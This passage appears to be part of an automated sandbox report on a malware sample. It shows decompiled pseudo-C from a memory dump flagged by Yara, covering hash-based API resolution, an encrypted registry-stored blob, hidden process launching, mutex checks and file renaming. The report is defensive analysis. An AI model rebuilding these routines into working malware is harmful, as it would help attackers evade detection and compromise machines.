                                    			}









                                    APIs
                                    • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,027BFC18,00000000,?,00000002), ref: 000CBEBE
                                    • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 000CBEE1
                                    • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 000CBF0E
                                    • RegCloseKey.KERNEL32(?,?,00000002), ref: 000CBF2E
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID:
                                    • API String ID: 1586453840-0
                                    • Opcode ID: d02e406de60bbb37e370e22bde6ecbd53870ad3f0dddb35dbfbb7c6fd1738d1e
                                    • Instruction ID: 0a60d65e2cdd778546922eb2bef94615bab3b931e93d59a9e41fb967d6fdba14
                                    • Opcode Fuzzy Hash: d02e406de60bbb37e370e22bde6ecbd53870ad3f0dddb35dbfbb7c6fd1738d1e
                                    • Instruction Fuzzy Hash: 7221EAB5A01148BF9B60DFA9DC85EAEBBF8EF84740B0141AAB901D7220D730DA01DB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000CDFAD(void* __ecx, intOrPtr __edx) {
                                    				signed int _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				intOrPtr _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				char _v92;
                                    				intOrPtr _t41;
                                    				signed int _t47;
                                    				signed int _t49;
                                    				signed int _t51;
                                    				void* _t56;
                                    				struct HINSTANCE__* _t58;
                                    				_Unknown_base(*)()* _t59;
                                    				intOrPtr _t60;
                                    				void* _t62;
                                    				intOrPtr _t63;
                                    				void* _t69;
                                    				char _t70;
                                    				void* _t75;
                                    				CHAR* _t80;
                                    				void* _t82;
                                    
                                    				_t75 = __ecx;
                                    				_v12 = __edx;
                                    				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                    				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                    				if(_t41 == 0) {
                                    					L4:
                                    					return 0;
                                    				}
                                    				_t62 = _t41 + __ecx;
                                    				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                    				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                    				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                    				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                    				_t47 = 0;
                                    				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                    				_v8 = 0;
                                    				_v16 = _t63;
                                    				if(_t63 == 0) {
                                    					goto L4;
                                    				} else {
                                    					goto L2;
                                    				}
                                    				while(1) {
                                    					L2:
                                    					_t49 = E000CD400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E000CC379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                    					_t51 = _v8;
                                    					if((_t49 ^ 0x218fe95b) == _v12) {
                                    						break;
                                    					}
                                    					_t73 = _v20;
                                    					_t47 = _t51 + 1;
                                    					_v8 = _t47;
                                    					if(_t47 < _v16) {
                                    						continue;
                                    					}
                                    					goto L4;
                                    				}
                                    				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                    				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                    				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                    					return _t80;
                                    				} else {
                                    					_t56 = 0;
                                    					while(1) {
                                    						_t70 = _t80[_t56];
                                    						if(_t70 == 0x2e || _t70 == 0) {
                                    							break;
                                    						}
                                    						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                    						_t56 = _t56 + 1;
                                    						if(_t56 < 0x40) {
                                    							continue;
                                    						}
                                    						break;
                                    					}
                                    					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                    					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                    					if( *((char*)(_t56 + _t80)) != 0) {
                                    						_t80 =  &(( &(_t80[1]))[_t56]);
                                    					}
                                    					_t40 =  &_v92; // 0x6c6c642e
                                    					_t58 = LoadLibraryA(_t40); // executed
                                    					if(_t58 == 0) {
                                    						goto L4;
                                    					}
                                    					_t59 = GetProcAddress(_t58, _t80);
                                    					if(_t59 == 0) {
                                    						goto L4;
                                    					}
                                    					return _t59;
                                    				}
                                    			}


























                                    APIs
                                    • LoadLibraryA.KERNEL32(.dll), ref: 000CE07D
                                    • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 000CE089
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: .dll
                                    • API String ID: 2574300362-2738580789
                                    • Opcode ID: 73480dcf04640b5668e538ebe0794b7acac3a1320454cbe5ad927de6f1f71708
                                    • Instruction ID: 5f9d211447d3819fd503f87bdcf7e534d45c92374d2040a9589af20f045a33b0
                                    • Opcode Fuzzy Hash: 73480dcf04640b5668e538ebe0794b7acac3a1320454cbe5ad927de6f1f71708
                                    • Instruction Fuzzy Hash: 6D31B231A001959BDB64CFA9C884BAEBBE5AF44304F38446ED905D7352DA74ED81CBE0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E000C9B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
                                    				void* _v8;
                                    				int _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				int _v24;
                                    				void* _v28;
                                    				char _v32;
                                    				char _v36;
                                    				int* _v40;
                                    				int** _v44;
                                    				void _v108;
                                    				int* _t90;
                                    				void* _t91;
                                    				char* _t92;
                                    				long _t96;
                                    				int* _t97;
                                    				intOrPtr _t98;
                                    				int* _t101;
                                    				long _t111;
                                    				int* _t112;
                                    				intOrPtr _t122;
                                    				char* _t125;
                                    				intOrPtr _t126;
                                    				intOrPtr _t128;
                                    				int* _t129;
                                    				intOrPtr _t131;
                                    				int* _t133;
                                    				intOrPtr _t134;
                                    				int* _t135;
                                    				intOrPtr _t136;
                                    				char* _t139;
                                    				int _t143;
                                    				int _t147;
                                    				intOrPtr _t148;
                                    				int* _t149;
                                    				int* _t154;
                                    				int** _t155;
                                    				int* _t161;
                                    				int* _t163;
                                    				intOrPtr _t164;
                                    				intOrPtr _t171;
                                    				int _t176;
                                    				char* _t177;
                                    				char* _t178;
                                    				char _t179;
                                    				void* _t180;
                                    				void* _t181;
                                    				void* _t183;
                                    
                                    				_t176 = 0;
                                    				_v24 = __edx;
                                    				_t177 = 0;
                                    				_v32 = __ecx;
                                    				_v28 = 0;
                                    				_v8 = 0x80000001;
                                    				_v20 = 0;
                                    				_t155 = E000C8604(0x110);
                                    				_v44 = _t155;
                                    				if(_t155 != 0) {
                                    					_t158 = _a4;
                                    					_t155[0x42] = _a4;
                                    					E000CB5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
                                    					_t161 = _v108;
                                    					__eflags = _t161 - 0x61 - 0x19;
                                    					_t90 = _t161;
                                    					if(_t161 - 0x61 <= 0x19) {
                                    						_t90 = _t90 - 0x20;
                                    						__eflags = _t90;
                                    					}
                                    					_v108 = _t90;
                                    					_t91 = E000C95C7(0x4d2);
                                    					_t163 = _v24;
                                    					_v16 = _t91;
                                    					__eflags = _t163;
                                    					if(_t163 == 0) {
                                    						L16:
                                    						_t164 =  *0xde688; // 0xf0000
                                    						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
                                    						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
                                    							_push(_t176);
                                    							_push( &_v108);
                                    							_push("\\");
                                    							_t92 = E000C9292(_t91);
                                    							_t181 = _t181 + 0x10;
                                    							L20:
                                    							_t177 = _t92;
                                    							_v20 = _t177;
                                    							goto L21;
                                    						}
                                    						_v24 = _t176;
                                    						_v8 = 0x80000003;
                                    						_t122 =  *0xde68c; // 0x27bfab8
                                    						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
                                    						__eflags = _v24 - _t177;
                                    						if(_v24 == _t177) {
                                    							goto L21;
                                    						}
                                    						_push(_t176);
                                    						_push( &_v108);
                                    						_t125 = "\\";
                                    						_push(_t125);
                                    						_push(_v16);
                                    						_push(_t125);
                                    						_t92 = E000C9292(_v24);
                                    						_t181 = _t181 + 0x18;
                                    						goto L20;
                                    					} else {
                                    						_t126 =  *0xde688; // 0xf0000
                                    						_t128 =  *0xde68c; // 0x27bfab8
                                    						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
                                    						__eflags = _t129;
                                    						if(_t129 != 0) {
                                    							_t91 = _v16;
                                    							goto L16;
                                    						}
                                    						_v12 = _t176;
                                    						_t131 =  *0xde68c; // 0x27bfab8
                                    						_v8 = 0x80000003;
                                    						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
                                    						__eflags = _v12 - _t177;
                                    						if(_v12 == _t177) {
                                    							L21:
                                    							E000C85C2( &_v16);
                                    							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
                                    							__eflags = _t96;
                                    							if(_t96 == 0) {
                                    								_t97 = _a8;
                                    								__eflags = _t97;
                                    								if(_t97 != 0) {
                                    									 *_t97 = 1;
                                    								}
                                    								_push(_v28);
                                    								L30:
                                    								_t98 =  *0xde68c; // 0x27bfab8
                                    								 *((intOrPtr*)(_t98 + 0x1c))();
                                    								_t155[0x43] = _v8;
                                    								_t101 = E000CC379(_t177);
                                    								 *_t155 = _t101;
                                    								__eflags = _t101;
                                    								if(_t101 == 0) {
                                    									L32:
                                    									E000C861A( &_v20, 0xffffffff);
                                    									return _t155;
                                    								} else {
                                    									goto L31;
                                    								}
                                    								do {
                                    									L31:
                                    									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
                                    									_t176 = _t176 + 1;
                                    									__eflags = _t176 -  *_t155;
                                    								} while (_t176 <  *_t155);
                                    								goto L32;
                                    							}
                                    							_v16 = _t176;
                                    							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
                                    							__eflags = _t111;
                                    							if(_t111 == 0) {
                                    								_t112 = _a8;
                                    								__eflags = _t112;
                                    								if(_t112 != 0) {
                                    									 *_t112 = _t176;
                                    								}
                                    								_push(_v16);
                                    								goto L30;
                                    							}
                                    							L23:
                                    							E000C861A( &_v44, 0x110);
                                    							memset( &_v108, _t176, 0x40);
                                    							E000C861A( &_v20, 0xffffffff);
                                    							goto L1;
                                    						}
                                    						_push(_t176);
                                    						_push(_v16);
                                    						_t178 = "\\";
                                    						_push(_t178);
                                    						_t133 = E000C9292(_v12);
                                    						_t181 = _t181 + 0x10;
                                    						_v40 = _t133;
                                    						__eflags = _t133;
                                    						if(_t133 == 0) {
                                    							goto L23;
                                    						}
                                    						_t134 =  *0xde68c; // 0x27bfab8
                                    						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
                                    						__eflags = _t135;
                                    						if(_t135 == 0) {
                                    							_t136 =  *0xde68c; // 0x27bfab8
                                    							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
                                    						} else {
                                    							_t143 = E000C95E1( &_v36, 0x34);
                                    							_v24 = _t143;
                                    							_t179 = E000C92E5(_v32);
                                    							_v32 = _t179;
                                    							E000C85D5( &_v24);
                                    							_t183 = _t181 + 0x18;
                                    							_t147 = E000C9256(_v12);
                                    							_v24 = _t147;
                                    							_t148 =  *0xde68c; // 0x27bfab8
                                    							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
                                    							__eflags = _t149;
                                    							if(_t149 == 0) {
                                    								_t154 = _a12;
                                    								__eflags = _t154;
                                    								if(_t154 != 0) {
                                    									 *_t154 = 1;
                                    								}
                                    							}
                                    							E000C861A( &_v32, 0xfffffffe);
                                    							E000C861A( &_v24, 0xfffffffe);
                                    							_t181 = _t183 + 0x10;
                                    							_t178 = "\\";
                                    						}
                                    						_t139 = E000C9292(_v12);
                                    						_t171 =  *0xde684; // 0x27bf8f0
                                    						_t181 = _t181 + 0x18;
                                    						_t177 = _t139;
                                    						_v20 = _t177;
                                    						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
                                    						E000C861A( &_v40, 0xffffffff);
                                    						goto L21;
                                    					}
                                    				}
                                    				L1:
                                    				return 0;
                                    			}

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 8353e44af509d9735a0a927840699760167d5c64e14aba3f13b978e54da95b18
                                    • Instruction ID: d99cd1c3d9fcc3767b0c57ffbf3441cc8e1f37364192496a450fb361744b74f1
                                    • Opcode Fuzzy Hash: 8353e44af509d9735a0a927840699760167d5c64e14aba3f13b978e54da95b18
                                    • Instruction Fuzzy Hash: FB913CB1D00209AFDF10DF95CC89EEEBBB8EF18350F10416AF915AB292D7349A00CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 82%
                                    			E000CA0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
                                    				char* _v12;
                                    				char _v16;
                                    				int _v20;
                                    				signed int _v24;
                                    				intOrPtr _v28;
                                    				char* _v32;
                                    				char _v52;
                                    				char _v64;
                                    				char _v328;
                                    				char _v2832;
                                    				signed int _t48;
                                    				signed int _t49;
                                    				char* _t54;
                                    				long _t73;
                                    				long _t80;
                                    				long _t83;
                                    				void* _t88;
                                    				char* _t89;
                                    				intOrPtr _t90;
                                    				void* _t103;
                                    				void* _t104;
                                    				char* _t106;
                                    				intOrPtr _t107;
                                    				char _t108;
                                    
                                    				_t48 = __ecx;
                                    				_t89 = __edx;
                                    				_v24 = __ecx;
                                    				if(_a4 == 0 || _a8 == 0) {
                                    					L13:
                                    					_t49 = _t48 | 0xffffffff;
                                    					__eflags = _t49;
                                    					return _t49;
                                    				} else {
                                    					_t115 = __edx;
                                    					if(__edx == 0) {
                                    						goto L13;
                                    					}
                                    					_t107 =  *((intOrPtr*)(__ecx + 0x108));
                                    					_push(_t107);
                                    					_t103 = 4;
                                    					_v12 = __edx;
                                    					_v28 = E000CD400( &_v12, _t103);
                                    					_t93 = _t107 + __edx;
                                    					E000D2301(_t107 + __edx,  &_v2832);
                                    					_t54 = E000D242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
                                    					_t108 = _a8;
                                    					_v12 = _t54;
                                    					_v20 = _t54 + 6 + _t108;
                                    					_t106 = E000C8604(_t54 + 6 + _t108);
                                    					_v32 = _t106;
                                    					if(_t106 != 0) {
                                    						 *_t106 = _a12;
                                    						_t16 =  &(_t106[6]); // 0x6
                                    						_t106[1] = 1;
                                    						_t106[2] = _t108;
                                    						E000C86E1(_t16, _a4, _t108);
                                    						_t21 = _t108 + 6; // 0x6
                                    						E000D22D3( &_v2832, _t21 + _t106, _v12);
                                    						_v16 = _t89;
                                    						_t90 = _v24;
                                    						_v12 =  *((intOrPtr*)(_t90 + 0x108));
                                    						_push( &_v52);
                                    						_t104 = 8;
                                    						E000CF490( &_v16, _t104);
                                    						E000CEAC1( &_v16,  &_v52, 0x14,  &_v328);
                                    						E000CEB2E(_t106, _v20,  &_v328);
                                    						_t73 = E000C9B0E(_t90);
                                    						_v12 = _t73;
                                    						__eflags = _t73;
                                    						if(_t73 != 0) {
                                    							E000C97A0(_v28,  &_v64, 0x10);
                                    							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
                                    							__eflags = _t80;
                                    							if(_t80 == 0) {
                                    								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
                                    								__eflags = _t83;
                                    								if(_t83 != 0) {
                                    									_push(0xfffffffc);
                                    									_pop(0);
                                    								}
                                    								RegCloseKey(_a4);
                                    							} else {
                                    								_push(0xfffffffd);
                                    								_pop(0);
                                    							}
                                    							E000C861A( &_v12, 0xffffffff);
                                    						}
                                    						E000C861A( &_v32, 0);
                                    						return 0;
                                    					}
                                    					_t88 = 0xfffffffe;
                                    					return _t88;
                                    				}
                                    			}

                                    APIs
                                      • Part of subcall function 000D242D: _ftol2_sse.MSVCRT ref: 000D248E
                                      • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                    • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 000CA1DE
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapOpen_ftol2_sse
                                    • String ID:
                                    • API String ID: 3756893521-0
                                    • Opcode ID: 16be1238e50dcd6ccbf2a17972ac82d6104939afd61b824ff034df4e1ce5065a
                                    • Instruction ID: 9aabb578f3ec898990dbc52fcad180c0f02837a836db019fe8de1ec4e559170f
                                    • Opcode Fuzzy Hash: 16be1238e50dcd6ccbf2a17972ac82d6104939afd61b824ff034df4e1ce5065a
                                    • Instruction Fuzzy Hash: B451B072A0021DBBCF10DF98DC85FDEBBB8AF05324F10826AF514AB191DB75A644CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 66%
                                    			E000CA911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
                                    				struct _PROCESS_INFORMATION _v20;
                                    				struct _STARTUPINFOW _v92;
                                    				signed int _t24;
                                    				intOrPtr _t30;
                                    				intOrPtr _t32;
                                    				intOrPtr _t34;
                                    				int _t42;
                                    				WCHAR* _t44;
                                    
                                    				_t42 = 0x44;
                                    				memset( &_v92, 0, _t42);
                                    				_v92.cb = _t42;
                                    				asm("stosd");
                                    				_t44 = 1;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				_t24 = _a16;
                                    				if(_t24 != 0) {
                                    					_v92.dwFlags = 1;
                                    					_v92.wShowWindow = 0;
                                    				}
                                    				asm("sbb eax, eax");
                                    				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
                                    					_t44 = 0;
                                    				} else {
                                    					if(_a8 != 0) {
                                    						_push(_a12);
                                    						_t34 =  *0xde684; // 0x27bf8f0
                                    						_push(_v20.hProcess);
                                    						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
                                    							GetExitCodeProcess(_v20.hProcess, _a8);
                                    						}
                                    					}
                                    					_t30 =  *0xde684; // 0x27bf8f0
                                    					 *((intOrPtr*)(_t30 + 0x30))(_v20.hThread);
                                    					_t32 =  *0xde684; // 0x27bf8f0
                                    					 *((intOrPtr*)(_t32 + 0x30))(_v20);
                                    				}
                                    				return _t44;
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 000CA925
                                    • CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,000CC1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 000CA96C
                                    • GetExitCodeProcess.KERNEL32(00000000,?), ref: 000CA990
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CodeCreateExitmemset
                                    • String ID:
                                    • API String ID: 4170947310-0
                                    • Opcode ID: 515fd2f31e6901e20d6c51561e52fb1df9f2721549949078c0095c01d271d124
                                    • Instruction ID: ad8e7d9e7c99006ac07fdead5766fa5e04d5cfaaf349d8d5b7d3a67e274f57a9
                                    • Opcode Fuzzy Hash: 515fd2f31e6901e20d6c51561e52fb1df9f2721549949078c0095c01d271d124
                                    • Instruction Fuzzy Hash: 4F210E71A10119BFEB519FA9DC85EAE7BBCEB18784B01441AFA15D6161D634DC008B61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			E000CB998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                    				long _v8;
                                    				void* _v12;
                                    				void* _t12;
                                    				void* _t20;
                                    				void* _t22;
                                    				union _TOKEN_INFORMATION_CLASS _t28;
                                    				void* _t31;
                                    
                                    				_push(_t22);
                                    				_push(_t22);
                                    				_t31 = 0;
                                    				_t28 = __edx;
                                    				_t20 = _t22;
                                    				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                    					L6:
                                    					_t12 = _t31;
                                    				} else {
                                    					_t31 = E000C8604(_v8);
                                    					_v12 = _t31;
                                    					if(_t31 != 0) {
                                    						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                    							goto L6;
                                    						} else {
                                    							E000C861A( &_v12, _t16);
                                    							goto L3;
                                    						}
                                    					} else {
                                    						L3:
                                    						_t12 = 0;
                                    					}
                                    				}
                                    				return _t12;
                                    			}











                                    APIs
                                    • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9B3
                                    • GetLastError.KERNEL32(?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9BA
                                      • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                    • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9E9
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: InformationToken$AllocateErrorHeapLast
                                    • String ID:
                                    • API String ID: 2499131667-0
                                    • Opcode ID: e9155d94487f8a68c3b89b0e28b4ce959b8024583ace24d3e3980001a81adf0b
                                    • Instruction ID: d997e41f721a916132a1fdbd49b54382bda47c6799cd78954eaa02ec7e04328f
                                    • Opcode Fuzzy Hash: e9155d94487f8a68c3b89b0e28b4ce959b8024583ace24d3e3980001a81adf0b
                                    • Instruction Fuzzy Hash: A501A272601118BF9B209BA6DC4AEAF7FECDB457A1B10022AFA05D7111EB30DD0087B0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000C590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
                                    				intOrPtr _t10;
                                    				void* _t13;
                                    				void* _t19;
                                    				signed int _t21;
                                    				signed int _t22;
                                    
                                    				_t13 = __edx;
                                    				if(__ecx != 0) {
                                    					_t22 = 0;
                                    					_t19 = CreateMutexA(0, 1, __ecx);
                                    					if(_t19 != 0) {
                                    						if(GetLastError() != 0xb7 || E000CA4BF(_t19, _t13) != 0xffffffff) {
                                    							_t22 = 1;
                                    							 *_a4 = _t19;
                                    						} else {
                                    							_t10 =  *0xde684; // 0x27bf8f0
                                    							 *((intOrPtr*)(_t10 + 0x30))(_t19);
                                    						}
                                    					} else {
                                    						GetLastError();
                                    						_t22 = 0xffffffff;
                                    					}
                                    				} else {
                                    					_t22 = _t21 | 0xffffffff;
                                    				}
                                    				return _t22;
                                    			}









                                    APIs
                                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000C59CD,000C5DD4,Global,000DBA18,?,00000000,?,00000002), ref: 000C5928
                                    • GetLastError.KERNEL32(?,?,000C59CD,000C5DD4,Global,000DBA18,?,00000000,?,00000002), ref: 000C5934
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateErrorLastMutex
                                    • String ID:
                                    • API String ID: 1925916568-0
                                    • Opcode ID: a8e76bdbdbd469d2b8c3e9a1a01432ac857b6536fe4a497d4adbc72172b7e5b0
                                    • Instruction ID: d073c145edc5ca2aa73541b9c57a8b093e21ae94b269b6476e6d31558b2c847e
                                    • Opcode Fuzzy Hash: a8e76bdbdbd469d2b8c3e9a1a01432ac857b6536fe4a497d4adbc72172b7e5b0
                                    • Instruction Fuzzy Hash: A1F02835601910CBD6A0175ADC84F3E7B98EB95772B51036AF969DB1E1CF34DC4443B1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000CA471(CHAR* __ecx, void* __edx) {
                                    				intOrPtr _t8;
                                    				void* _t16;
                                    				void* _t17;
                                    
                                    				_t16 = __edx; // executed
                                    				_t17 = CreateMutexA(0, 1, __ecx);
                                    				if(_t17 != 0) {
                                    					if(GetLastError() == 0xb7 && E000CA4BF(_t17, _t16) < 0) {
                                    						_t8 =  *0xde684; // 0x27bf8f0
                                    						 *((intOrPtr*)(_t8 + 0x30))(_t17);
                                    						_t17 = 0;
                                    					}
                                    					return _t17;
                                    				}
                                    				GetLastError();
                                    				return 0;
                                    			}







                                    APIs
                                    • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,000C4E14,00000000), ref: 000CA47F
                                    • GetLastError.KERNEL32 ref: 000CA48B
                                    • GetLastError.KERNEL32 ref: 000CA495
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$CreateMutex
                                    • String ID:
                                    • API String ID: 200418032-0
                                    • Opcode ID: 77e21d80ee078d91a8c29d57bde9561238bcfa181556416213a9dbb61c26a2d7
                                    • Instruction ID: aa0b7b2252ede9d51be57bd9111e8f042ae3321c19d90ec579b42b1c7a2d6374
                                    • Opcode Fuzzy Hash: 77e21d80ee078d91a8c29d57bde9561238bcfa181556416213a9dbb61c26a2d7
                                    • Instruction Fuzzy Hash: 49F0ED313014249BE6252729E88CF5F3B99DFE9754F02446AFA09CB251EAACCC0643F2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 91%
                                    			E000C6DA0(void* __eflags, void* __fp0) {
                                    				short _v536;
                                    				WCHAR* _v544;
                                    				WCHAR* _t9;
                                    				intOrPtr _t10;
                                    				intOrPtr _t11;
                                    				void* _t22;
                                    				void* _t32;
                                    				intOrPtr _t34;
                                    				intOrPtr _t35;
                                    				intOrPtr _t41;
                                    				intOrPtr _t43;
                                    				intOrPtr _t46;
                                    				intOrPtr _t49;
                                    				void* _t51;
                                    				void* _t53;
                                    				void* _t56;
                                    				WCHAR* _t59;
                                    				signed int _t60;
                                    				void* _t62;
                                    				void* _t63;
                                    				void* _t74;
                                    
                                    				_t74 = __fp0;
                                    				_t34 =  *0xde778; // 0x27bfc18
                                    				_t62 = (_t60 & 0xfffffff8) - 0x21c;
                                    				_t51 = 0x31;
                                    				_t32 = 1; // executed
                                    				_t9 = E000C9ED0(_t34, _t51); // executed
                                    				if(_t9 != 0) {
                                    					_t10 =  *0xde78c; // 0x0
                                    					_t66 = _t10;
                                    					if(_t10 == 0) {
                                    						_t49 =  *0xde688; // 0xf0000
                                    						_t10 = E000CEDCF(_t49 + 0xb0, _t51, _t66);
                                    						 *0xde78c = _t10;
                                    					}
                                    					_push(0);
                                    					_push(_t10);
                                    					_t11 =  *0xde688; // 0xf0000
                                    					_push(L"\\c");
                                    					_t9 = E000C92E5(_t11 + 0x438);
                                    					_t59 = _t9;
                                    					_t63 = _t62 + 0x10;
                                    					_v544 = _t59;
                                    					if(_t59 != 0) {
                                    						while(1) {
                                    							_t35 =  *0xde688; // 0xf0000
                                    							_t56 = E000CA471(_t35 + 0x1878, 0x1388);
                                    							if(_t56 == 0) {
                                    								break;
                                    							}
                                    							if(E000CB269(_t59) == 0) {
                                    								_t32 = E000CF14F(_t59, 0x1388, _t74);
                                    							}
                                    							E000CA4DB(_t56);
                                    							_t41 =  *0xde684; // 0x27bf8f0
                                    							 *((intOrPtr*)(_t41 + 0x30))(_t56);
                                    							if(_t32 > 0) {
                                    								E000C980C( &_v544);
                                    								_t43 =  *0xde778; // 0x27bfc18
                                    								_t53 = 0x33;
                                    								if(E000C9ED0(_t43, _t53) != 0) {
                                    									L12:
                                    									__eflags = E000C1C68(_t59, __eflags, _t74);
                                    									if(__eflags >= 0) {
                                    										E000CB1B1(_t59, _t53, __eflags, _t74);
                                    										continue;
                                    									}
                                    								} else {
                                    									_t46 =  *0xde778; // 0x27bfc18
                                    									_t53 = 0x12;
                                    									_t22 = E000C9ED0(_t46, _t53);
                                    									_t72 = _t22;
                                    									if(_t22 != 0 || E000CA4EF(_t53, _t72) != 0) {
                                    										_push(E000C980C(0));
                                    										E000C9640( &_v536, 0x104, L"%s.%u", _t59);
                                    										_t63 = _t63 + 0x14;
                                    										MoveFileW(_t59,  &_v536);
                                    										continue;
                                    									} else {
                                    										goto L12;
                                    									}
                                    								}
                                    							}
                                    							break;
                                    						}
                                    						_t9 = E000C861A( &_v544, 0xfffffffe);
                                    					}
                                    				}
                                    				return _t9;
                                    			}

























                                    APIs
                                    Strings
